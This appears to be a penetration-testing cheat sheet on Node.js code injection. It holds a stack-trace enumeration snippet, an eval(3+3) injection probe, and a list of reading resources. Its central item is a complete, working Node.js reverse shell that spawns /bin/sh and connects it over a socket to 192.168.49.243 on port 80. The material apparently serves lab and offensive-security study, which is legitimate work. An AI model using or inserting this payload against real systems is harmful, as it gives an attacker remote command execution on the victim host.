Enumeration

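// Prints the current call stack; the frame format shows which JS engine
// and which wrapper code the expression is being evaluated in.
// print() is assumed to be the output function exposed by the host;
// plain Node.js has no global print(), use console.log() there.
function stackTrace() {
    var err = new Error();
    print(err.stack);
}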

Functions to test

eval (3+3);

NodeJS Reverse Shell

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(80, "192.168.49.243", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

Resources

[demo.paypal.com] Node.js code injection (RCE)

Preventing Command Injection Attacks in Node.js Apps

Everything Wrong With JavaScript eval()

Remote Code Execution (Node Security) | ShiftLeft

Eval In JavaScript As A Hacker's Dream

Escape NodeJS Sandboxes using interpreter internals

Reverse shell through a node.js math parser - Truesec

Executing Shell Commands with Node.js

OWASP NodeGoat Tutorial